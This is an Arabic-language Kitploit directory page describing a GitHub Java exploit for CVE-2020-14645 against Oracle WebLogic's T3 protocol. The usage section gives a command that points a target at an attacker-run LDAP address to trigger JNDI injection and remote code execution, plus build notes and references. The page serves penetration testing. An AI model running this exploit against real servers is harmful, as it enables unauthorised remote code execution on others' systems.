Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-14645 — استغلال قائم على Java لـ CVE-2020-14645 يستهدف بروتوكول T3 الخاص بـ Oracle WebLogic مع حقن JNDI لتنفيذ التعليمات البرمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/daboquan/cve-2020-14645
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubdaboquan/cve-2020-14645

CVE-2020-14645

استغلال قائم على Java لـ CVE-2020-14645 يستهدف بروتوكول T3 الخاص بـ Oracle WebLogic مع حقن JNDI لتنفيذ التعليمات البرمجية عن بُعد.

عرض المستودع
3منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-14645

طريقة الاستخدام

أولاً، استخدم NDI-Injection-Exploit للاستماع وإنشاء عنوان ldap.

java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]

-Target و -RMI إلزاميان، يمكن استخدام --SSL مع https، -Port الافتراضي 7001.

للتجميع الذاتي، تحتاج إلى إضافة coherence.jar و wlfullclient.jar.

مرجع الثغرة:

https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd

مرجع الكود:

https://github.com/Y4er/CVE-2020-2883

تنزيل الأداة